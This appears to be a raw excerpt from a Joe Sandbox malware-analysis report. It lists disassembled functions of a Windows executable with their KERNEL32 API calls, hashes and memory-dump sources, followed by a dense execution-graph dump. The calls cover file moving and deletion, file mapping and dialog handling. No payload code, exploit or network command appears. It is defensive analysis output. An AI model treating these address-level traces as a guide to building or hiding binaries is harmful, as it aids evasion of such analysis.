                                                                                              • Opcode ID: 963970c68648768c4eef1e97e3b658c61329fdf949e471e4e77162e4a75e60f7
                                                                                              • Instruction ID: fb33af309896f77188fc72f29119c0801172fc7619329ad0b2e7777630e43b36
                                                                                              • Opcode Fuzzy Hash: 963970c68648768c4eef1e97e3b658c61329fdf949e471e4e77162e4a75e60f7
                                                                                              • Instruction Fuzzy Hash: 5311E535254364BFDB279BA4AC53BEA379CAB05741F168121F845A7192C6A06884CBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032233E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00010000,00322480,?,00000000,00000000), ref: 00322362
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 003223A9
                                                                                                • Part of subcall function 003176E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00317707
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2655393344-3849766595
                                                                                              • Opcode ID: c8091a3df3e1d3243dbec249b52c5d3e2f4e98932021dc9be8d07be18ce86ee9
                                                                                              • Instruction ID: 2aef43894917469c80727a86a66f7c6ccf807f741373836c4db759a37de8ebfe
                                                                                              • Opcode Fuzzy Hash: c8091a3df3e1d3243dbec249b52c5d3e2f4e98932021dc9be8d07be18ce86ee9
                                                                                              • Instruction Fuzzy Hash: 4701DBBA2447167FD327AF54AC42FA3B3A8EB44752F11012DFB429B1D0CEA168548620
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F82F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(80000000,0032F774,0000001C,0032F969,00000000,?,?,?,?,?,?,?,0032F774,00000004,00373D24,0032F9F9), ref: 0032F840
                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0032F774,00000004,00373D24,0032F9F9), ref: 0032F85B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                              • String ID: D
                                                                                              • API String ID: 401686933-2746444292
                                                                                              • Opcode ID: 5c7af62a2cf83464ab205a6251346e1ea269c18ddcd59b4a8928a81c29393d17
                                                                                              • Instruction ID: 77380d2a8722f35858946c96f3e7d906e6be78c6a0da3d50e82849b9b375681c
                                                                                              • Opcode Fuzzy Hash: 5c7af62a2cf83464ab205a6251346e1ea269c18ddcd59b4a8928a81c29393d17
                                                                                              • Instruction Fuzzy Hash: A701F7326001196BCB14DE29EC05BDE7BF9AFC5324F0DC234ED19DB254EA34E9018680
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033962A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0033D0F0: GetEnvironmentStringsW.KERNEL32 ref: 0033D0F9
                                                                                                • Part of subcall function 0033D0F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033D11C
                                                                                                • Part of subcall function 0033D0F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0033D142
                                                                                                • Part of subcall function 0033D0F0: _free.LIBCMT ref: 0033D155
                                                                                                • Part of subcall function 0033D0F0: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033D164
                                                                                              • _free.LIBCMT ref: 00339670
                                                                                              • _free.LIBCMT ref: 00339677
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                              • String ID: hB7
                                                                                              • API String ID: 400815659-3279407874
                                                                                              • Opcode ID: 592514f35efd861a882f7d73752c97b7f043c823d249be6ab8dd18c9509750a1
                                                                                              • Instruction ID: 11d2e1e417bebf3a0902b5ff0f25c258c4160e049837c16d8326091637097778
                                                                                              • Opcode Fuzzy Hash: 592514f35efd861a882f7d73752c97b7f043c823d249be6ab8dd18c9509750a1
                                                                                              • Instruction Fuzzy Hash: 82E02B22A0B810C1D633323E6CC3B6F02084BC1730F260317F828DE1C3DE948842019B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00322303 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00322526,?), ref: 00322309
                                                                                              • GetLastError.KERNEL32(?), ref: 00322315
                                                                                                • Part of subcall function 003176E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00317707
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0032231E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 1091760877-2248577382
                                                                                              • Opcode ID: 19a3d905c41e3950e725a3095f11d96fb25f2bd73cb64ec46990b85235e6fd03
                                                                                              • Instruction ID: 871b2f6c4bafdd719858f9d784321a98bd2681d6cb85d7f42335693917b9e1f9
                                                                                              • Opcode Fuzzy Hash: 19a3d905c41e3950e725a3095f11d96fb25f2bd73cb64ec46990b85235e6fd03
                                                                                              • Instruction Fuzzy Hash: 9AD0123950892137C51367287C09EEEB9195B22770F290714F6355A1E1CE6009A181A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031F5BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,0031ED75,?), ref: 0031F5C3
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0031ED75,?), ref: 0031F5D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271
                                                                                              • Opcode ID: 1b880b6d277f01fd9269b93d3a5ff9f1e7b482788b9ce204a50b4fd25b503b81
                                                                                              • Instruction ID: a2e55fdea944c51a46405599d50f51549ad76ae86e09c8252c4240c28ec24ff6
                                                                                              • Opcode Fuzzy Hash: 1b880b6d277f01fd9269b93d3a5ff9f1e7b482788b9ce204a50b4fd25b503b81
                                                                                              • Instruction Fuzzy Hash: 2FC0123124475056D73227716C0DBC36E9C5B02755F060468B601DE1C0DEE5E8858660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:1497
                                                                                              Total number of Limit Nodes:44
                                                                                              execution_graph 25373 721f72 128 API calls __EH_prolog 25296 73a070 10 API calls 25358 73b270 99 API calls 23425 729a74 23428 729a7e 23425->23428 23426 729b9d SetFilePointer 23427 729bb6 GetLastError 23426->23427 23431 729ab1 23426->23431 23427->23431 23428->23426 23430 729b79 23428->23430 23428->23431 23432 72981a 23428->23432 23430->23426 23433 729833 23432->23433 23436 729e80 23433->23436 23437 729e92 23436->23437 23438 729ea5 23436->23438 23439 729865 23437->23439 23445 726d5b 77 API calls 23437->23445 23438->23439 23440 729eb8 SetFilePointer 23438->23440 23439->23430 23440->23439 23442 729ed4 GetLastError 23440->23442 23442->23439 23443 729ede 23442->23443 23443->23439 23446 726d5b 77 API calls 23443->23446 23445->23438 23446->23439 25298 721075 84 API calls 23447 729f7a 23448 729f88 23447->23448 23449 729f8f 23447->23449 23450 729f9c GetStdHandle 23449->23450 23457 729fab 23449->23457 23450->23457 23451 72a003 WriteFile 23451->23457 23452 729fd4 WriteFile 23453 729fcf 23452->23453 23452->23457 23453->23452 23453->23457 23455 72a095 23459 726e98 77 API calls 23455->23459 23457->23448 23457->23451 23457->23452 23457->23453 23457->23455 23458 726baa 78 API calls 23457->23458 23458->23457 23459->23448 25300 73c793 107 API calls 5 library calls 25375 747f6e 52 API calls 2 library calls 25359 748268 55 API calls _free 25301 73e455 14 API calls ___delayLoadHelper2@8 24577 73cd58 24578 73ce22 24577->24578 24584 73cd7b _wcschr 24577->24584 24593 73c793 _wcslen _wcsrchr 24578->24593 24605 73d78f 24578->24605 24579 73b314 ExpandEnvironmentStringsW 24579->24593 24581 73d40a 24582 731fbb CompareStringW 24582->24584 24584->24578 24584->24582 24585 73ca67 SetWindowTextW 24585->24593 24588 743e3e 22 API calls 24588->24593 24590 73c855 SetFileAttributesW 24591 73c90f GetFileAttributesW 24590->24591 24603 73c86f __cftof _wcslen 24590->24603 24591->24593 24595 73c921 DeleteFileW 24591->24595 24593->24579 24593->24581 24593->24585 24593->24588 24593->24590 24596 73cc31 GetDlgItem SetWindowTextW SendMessageW 24593->24596 24600 73cc71 SendMessageW 24593->24600 24604 731fbb CompareStringW 24593->24604 24627 73a64d GetCurrentDirectoryW 24593->24627 24629 72a5d1 6 API calls 24593->24629 24630 72a55a FindClose 24593->24630 24631 73b48e 76 API calls 2 library calls 24593->24631 24595->24593 24597 73c932 24595->24597 24596->24593 24598 724092 _swprintf 51 API calls 24597->24598 24599 73c952 GetFileAttributesW 24598->24599 24599->24597 24601 73c967 MoveFileW 24599->24601 24600->24593 24601->24593 24602 73c97f MoveFileExW 24601->24602 24602->24593 24603->24591 24603->24593 24628 72b991 51 API calls 3 library calls 24603->24628 24604->24593 24606 73d799 __cftof _wcslen 24605->24606 24607 73d9c0 24606->24607 24608 73d8a5 24606->24608 24609 73d9e7 24606->24609 24632 731fbb CompareStringW 24606->24632 24607->24609 24612 73d9de ShowWindow 24607->24612 24611 72a231 3 API calls 24608->24611 24609->24593 24613 73d8ba 24611->24613 24612->24609 24619 73d8d1 24613->24619 24633 72b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24613->24633 24615 73d925 24634 73dc3b 6 API calls 24615->24634 24616 73d97b CloseHandle 24617 73d989 24616->24617 24618 73d994 24616->24618 24635 731fbb CompareStringW 24617->24635 24618->24607 24619->24609 24619->24615 24619->24616 24621 73d91b ShowWindow 24619->24621 24621->24615 24623 73d93d 24623->24616 24624 73d950 GetExitCodeProcess 24623->24624 24624->24616 24625 73d963 24624->24625 24625->24616 24627->24593 24628->24603 24629->24593 24630->24593 24631->24593 24632->24608 24633->24619 24634->24623 24635->24618 25302 73a440 GdipCloneImage GdipAlloc 25361 743a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25376 751f40 CloseHandle 24651 73e44b 24652 73e3f4 24651->24652 24652->24651 24653 73e85d ___delayLoadHelper2@8 14 API calls 24652->24653 24653->24652 25336 73f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25378 73ff30 LocalFree 25149 74bb30 25150 74bb39 25149->25150 25151 74bb42 25149->25151 25153 74ba27 25150->25153 25154 7497e5 _unexpected 38 API calls 25153->25154 25155 74ba34 25154->25155 25173 74bb4e 25155->25173 25157 74ba3c 25182 74b7bb 25157->25182 25160 74ba53 25160->25151 25161 748e06 __vswprintf_c_l 21 API calls 25162 74ba64 25161->25162 25163 74ba96 25162->25163 25189 74bbf0 25162->25189 25165 748dcc _free 20 API calls 25163->25165 25165->25160 25167 74ba91 25199 7491a8 20 API calls __dosmaperr 25167->25199 25169 74bada 25169->25163 25200 74b691 26 API calls 25169->25200 25170 74baae 25170->25169 25171 748dcc _free 20 API calls 25170->25171 25171->25169 25174 74bb5a __FrameHandler3::FrameUnwindToState 25173->25174 25175 7497e5 _unexpected 38 API calls 25174->25175 25176 74bb64 25175->25176 25179 74bbe8 _abort 25176->25179 25181 748dcc _free 20 API calls 25176->25181 25201 748d24 38 API calls _abort 25176->25201 25202 74ac31 EnterCriticalSection 25176->25202 25203 74bbdf LeaveCriticalSection _abort 25176->25203 25179->25157 25181->25176 25183 744636 __fassign 38 API calls 25182->25183 25184 74b7cd 25183->25184 25185 74b7dc GetOEMCP 25184->25185 25186 74b7ee 25184->25186 25188 74b805 25185->25188 25187 74b7f3 GetACP 25186->25187 25186->25188 25187->25188 25188->25160 25188->25161 25190 74b7bb 40 API calls 25189->25190 25191 74bc0f 25190->25191 25194 74bc60 IsValidCodePage 25191->25194 25196 74bc16 25191->25196 25197 74bc85 __cftof 25191->25197 25192 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25193 74ba89 25192->25193 25193->25167 25193->25170 25195 74bc72 GetCPInfo 25194->25195 25194->25196 25195->25196 25195->25197 25196->25192 25204 74b893 GetCPInfo 25197->25204 25199->25163 25200->25163 25202->25176 25203->25176 25205 74b977 25204->25205 25206 74b8cd 25204->25206 25209 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25205->25209 25214 74c988 25206->25214 25211 74ba23 25209->25211 25211->25196 25213 74ab78 __vswprintf_c_l 43 API calls 25213->25205 25215 744636 __fassign 38 API calls 25214->25215 25216 74c9a8 MultiByteToWideChar 25215->25216 25218 74ca7e 25216->25218 25219 74c9e6 25216->25219 25220 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25218->25220 25221 748e06 __vswprintf_c_l 21 API calls 25219->25221 25224 74ca07 __cftof __vsnwprintf_l 25219->25224 25222 74b92e 25220->25222 25221->25224 25228 74ab78 25222->25228 25223 74ca78 25233 74abc3 20 API calls _free 25223->25233 25224->25223 25226 74ca4c MultiByteToWideChar 25224->25226 25226->25223 25227 74ca68 GetStringTypeW 25226->25227 25227->25223 25229 744636 __fassign 38 API calls 25228->25229 25230 74ab8b 25229->25230 25234 74a95b 25230->25234 25233->25218 25235 74a976 __vswprintf_c_l 25234->25235 25236 74a99c MultiByteToWideChar 25235->25236 25237 74a9c6 25236->25237 25238 74ab50 25236->25238 25241 748e06 __vswprintf_c_l 21 API calls 25237->25241 25243 74a9e7 __vsnwprintf_l 25237->25243 25239 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25238->25239 25240 74ab63 25239->25240 25240->25213 25241->25243 25242 74aa30 MultiByteToWideChar 25244 74aa49 25242->25244 25256 74aa9c 25242->25256 25243->25242 25243->25256 25261 74af6c 25244->25261 25248 74aaab 25252 748e06 __vswprintf_c_l 21 API calls 25248->25252 25257 74aacc __vsnwprintf_l 25248->25257 25249 74aa73 25251 74af6c __vswprintf_c_l 11 API calls 25249->25251 25249->25256 25250 74ab41 25269 74abc3 20 API calls _free 25250->25269 25251->25256 25252->25257 25253 74af6c __vswprintf_c_l 11 API calls 25255 74ab20 25253->25255 25255->25250 25258 74ab2f WideCharToMultiByte 25255->25258 25270 74abc3 20 API calls _free 25256->25270 25257->25250 25257->25253 25258->25250 25259 74ab6f 25258->25259 25271 74abc3 20 API calls _free 25259->25271 25262 74ac98 _unexpected 5 API calls 25261->25262 25263 74af93 25262->25263 25264 74af9c 25263->25264 25272 74aff4 10 API calls 3 library calls 25263->25272 25267 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25264->25267 25266 74afdc LCMapStringW 25266->25264 25268 74aa60 25267->25268 25268->25248 25268->25249 25268->25256 25269->25256 25270->25238 25271->25256 25272->25266 25305 74c030 GetProcessHeap 25362 73c220 93 API calls _swprintf 25307 74f421 21 API calls __vswprintf_c_l 25308 721025 29 API calls 25337 74b4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25381 721710 86 API calls 25338 73ad10 73 API calls 25312 73a400 GdipDisposeImage GdipFree 25363 73d600 70 API calls 25313 746000 QueryPerformanceFrequency QueryPerformanceCounter 25341 742900 6 API calls 4 library calls 25364 74f200 51 API calls 25383 74a700 21 API calls 25344 7295f0 80 API calls 25345 73fd4f 9 API calls 2 library calls 25365 725ef0 82 API calls 23371 7498f0 23379 74adaf 23371->23379 23374 749904 23376 74990c 23377 749919 23376->23377 23387 749920 11 API calls 23376->23387 23388 74ac98 23379->23388 23382 74adee TlsAlloc 23384 74addf 23382->23384 23395 73fbbc 23384->23395 23385 7498fa 23385->23374 23386 749869 20 API calls 2 library calls 23385->23386 23386->23376 23387->23374 23389 74acc8 23388->23389 23393 74acc4 23388->23393 23389->23382 23389->23384 23390 74ace8 23390->23389 23392 74acf4 GetProcAddress 23390->23392 23394 74ad04 _unexpected 23392->23394 23393->23389 23393->23390 23402 74ad34 23393->23402 23394->23389 23396 73fbc5 IsProcessorFeaturePresent 23395->23396 23397 73fbc4 23395->23397 23399 73fc07 23396->23399 23397->23385 23409 73fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23399->23409 23401 73fcea 23401->23385 23403 74ad55 LoadLibraryExW 23402->23403 23404 74ad4a 23402->23404 23405 74ad72 GetLastError 23403->23405 23408 74ad8a 23403->23408 23404->23393 23407 74ad7d LoadLibraryExW 23405->23407 23405->23408 23406 74ada1 FreeLibrary 23406->23404 23407->23408 23408->23404 23408->23406 23409->23401 23410 74abf0 23412 74abfb 23410->23412 23413 74ac24 23412->23413 23414 74ac20 23412->23414 23416 74af0a 23412->23416 23423 74ac50 DeleteCriticalSection 23413->23423 23417 74ac98 _unexpected 5 API calls 23416->23417 23418 74af31 23417->23418 23419 74af4f InitializeCriticalSectionAndSpinCount 23418->23419 23420 74af3a 23418->23420 23419->23420 23421 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23420->23421 23422 74af66 23421->23422 23422->23412 23423->23414 25315 7488f0 7 API calls ___scrt_uninitialize_crt 25317 742cfb 38 API calls 4 library calls 23461 73b7e0 23462 73b7ea __EH_prolog 23461->23462 23627 721316 23462->23627 23465 73b841 23466 73b82a 23466->23465 23469 73b89b 23466->23469 23470 73b838 23466->23470 23467 73bf0f 23706 73d69e 23467->23706 23476 73b92e GetDlgItemTextW 23469->23476 23477 73b8b1 23469->23477 23472 73b878 23470->23472 23473 73b83c 23470->23473 23472->23465 23484 73b95f EndDialog 23472->23484 23473->23465 23482 72e617 53 API calls 23473->23482 23474 73bf2a SendMessageW 23475 73bf38 23474->23475 23478 73bf52 GetDlgItem SendMessageW 23475->23478 23479 73bf41 SendDlgItemMessageW 23475->23479 23476->23472 23480 73b96b 23476->23480 23481 72e617 53 API calls 23477->23481 23724 73a64d GetCurrentDirectoryW 23478->23724 23479->23478 23485 73b980 GetDlgItem 23480->23485 23625 73b974 23480->23625 23488 73b8ce SetDlgItemTextW 23481->23488 23489 73b85b 23482->23489 23484->23465 23486 73b9b7 SetFocus 23485->23486 23487 73b994 SendMessageW SendMessageW 23485->23487 23491 73b9c7 23486->23491 23507 73b9e0 23486->23507 23487->23486 23492 73b8d9 23488->23492 23746 72124f SHGetMalloc 23489->23746 23490 73bf82 GetDlgItem 23494 73bfa5 SetWindowTextW 23490->23494 23495 73bf9f 23490->23495 23496 72e617 53 API calls 23491->23496 23492->23465 23501 73b8e6 GetMessageW 23492->23501 23725 73abab GetClassNameW 23494->23725 23495->23494 23502 73b9d1 23496->23502 23497 73b862 23497->23465 23508 73c1fc SetDlgItemTextW 23497->23508 23498 73be55 23503 72e617 53 API calls 23498->23503 23501->23465 23505 73b8fd IsDialogMessageW 23501->23505 23747 73d4d4 23502->23747 23509 73be65 SetDlgItemTextW 23503->23509 23505->23492 23511 73b90c TranslateMessage DispatchMessageW 23505->23511 23512 72e617 53 API calls 23507->23512 23508->23465 23510 73be79 23509->23510 23513 72e617 53 API calls 23510->23513 23511->23492 23517 73ba17 23512->23517 23551 73be9c _wcslen 23513->23551 23514 73b9d9 23637 72a0b1 23514->23637 23516 73bff0 23520 73c020 23516->23520 23524 72e617 53 API calls 23516->23524 23521 724092 _swprintf 51 API calls 23517->23521 23519 73c73f 97 API calls 23519->23516 23530 73c73f 97 API calls 23520->23530 23581 73c0d8 23520->23581 23522 73ba29 23521->23522 23525 73d4d4 16 API calls 23522->23525 23529 73c003 SetDlgItemTextW 23524->23529 23525->23514 23526 73c18b 23532 73c194 EnableWindow 23526->23532 23533 73c19d 23526->23533 23527 73ba73 23643 73ac04 SetCurrentDirectoryW 23527->23643 23528 73ba68 GetLastError 23528->23527 23535 72e617 53 API calls 23529->23535 23531 73c03b 23530->23531 23541 73c04d 23531->23541 23573 73c072 23531->23573 23532->23533 23538 73c1ba 23533->23538 23765 7212d3 GetDlgItem EnableWindow 23533->23765 23534 73beed 23537 72e617 53 API calls 23534->23537 23539 73c017 SetDlgItemTextW 23535->23539 23537->23465 23544 73c1e1 23538->23544 23559 73c1d9 SendMessageW 23538->23559 23539->23520 23540 73ba87 23545 73ba9e 23540->23545 23546 73ba90 GetLastError 23540->23546 23763 739ed5 32 API calls 23541->23763 23542 73c0cb 23547 73c73f 97 API calls 23542->23547 23544->23465 23554 72e617 53 API calls 23544->23554 23548 73bb11 23545->23548 23552 73bb20 23545->23552 23553 73baae GetTickCount 23545->23553 23546->23545 23547->23581 23548->23552 23556 73bd56 23548->23556 23550 73c1b0 23766 7212d3 GetDlgItem EnableWindow 23550->23766 23551->23534 23555 72e617 53 API calls 23551->23555 23563 73bcfb 23552->23563 23564 73bcf1 23552->23564 23565 73bb39 GetModuleFileNameW 23552->23565 23644 724092 23553->23644 23554->23497 23562 73bed0 23555->23562 23662 7212f1 GetDlgItem ShowWindow 23556->23662 23557 73c066 23557->23573 23559->23544 23569 724092 _swprintf 51 API calls 23562->23569 23572 72e617 53 API calls 23563->23572 23564->23472 23564->23563 23757 72f28c 82 API calls 23565->23757 23566 73c169 23764 739ed5 32 API calls 23566->23764 23567 73bd66 23663 7212f1 GetDlgItem ShowWindow 23567->23663 23568 73bac7 23647 72966e 23568->23647 23569->23534 23578 73bd05 23572->23578 23573->23542 23579 73c73f 97 API calls 23573->23579 23575 72e617 53 API calls 23575->23581 23576 73bb5f 23582 724092 _swprintf 51 API calls 23576->23582 23577 73c188 23577->23526 23583 724092 _swprintf 51 API calls 23578->23583 23584 73c0a0 23579->23584 23580 73bd70 23664 72e617 23580->23664 23581->23526 23581->23566 23581->23575 23587 73bb81 CreateFileMappingW 23582->23587 23588 73bd23 23583->23588 23584->23542 23589 73c0a9 DialogBoxParamW 23584->23589 23592 73bbe3 GetCommandLineW 23587->23592 23620 73bc60 __InternalCxxFrameHandler 23587->23620 23600 72e617 53 API calls 23588->23600 23589->23472 23589->23542 23591 73baed 23594 73baff 23591->23594 23595 73baf4 GetLastError 23591->23595 23596 73bbf4 23592->23596 23655 72959a 23594->23655 23595->23594 23758 73b425 SHGetMalloc 23596->23758 23597 73bd8c SetDlgItemTextW GetDlgItem 23601 73bdc1 23597->23601 23602 73bda9 GetWindowLongW SetWindowLongW 23597->23602 23604 73bd3d 23600->23604 23669 73c73f 23601->23669 23602->23601 23603 73bc10 23759 73b425 SHGetMalloc 23603->23759 23608 73bc1c 23760 73b425 SHGetMalloc 23608->23760 23609 73c73f 97 API calls 23611 73bddd 23609->23611 23694 73da52 23611->23694 23612 73bc28 23761 72f3fa 82 API calls 2 library calls 23612->23761 23614 73bccb 23614->23564 23619 73bce1 UnmapViewOfFile CloseHandle 23614->23619 23616 73bc3f MapViewOfFile 23616->23620 23618 73c73f 97 API calls 23624 73be03 23618->23624 23619->23564 23620->23614 23621 73bcb7 Sleep 23620->23621 23621->23614 23621->23620 23622 73be2c 23762 7212d3 GetDlgItem EnableWindow 23622->23762 23624->23622 23626 73c73f 97 API calls 23624->23626 23625->23472 23625->23498 23626->23622 23628 721378 23627->23628 23629 72131f 23627->23629 23768 72e2c1 GetWindowLongW SetWindowLongW 23628->23768 23631 721385 23629->23631 23767 72e2e8 62 API calls 2 library calls 23629->23767 23631->23465 23631->23466 23631->23467 23633 721341 23633->23631 23634 721354 GetDlgItem 23633->23634 23634->23631 23635 721364 23634->23635 23635->23631 23636 72136a SetWindowTextW 23635->23636 23636->23631 23640 72a0bb 23637->23640 23638 72a14c 23639 72a2b2 8 API calls 23638->23639 23641 72a175 23638->23641 23639->23641 23640->23638 23640->23641 23769 72a2b2 23640->23769 23641->23527 23641->23528 23643->23540 23807 724065 23644->23807 23648 729678 23647->23648 23649 7296d5 CreateFileW 23648->23649 23650 7296c9 23648->23650 23649->23650 23651 72971f 23650->23651 23652 72bb03 GetCurrentDirectoryW 23650->23652 23651->23591 23653 729704 23652->23653 23653->23651 23654 729708 CreateFileW 23653->23654 23654->23651 23656 7295cf 23655->23656 23657 7295be 23655->23657 23656->23548 23657->23656 23658 7295d1 23657->23658 23659 7295ca 23657->23659 23891 729620 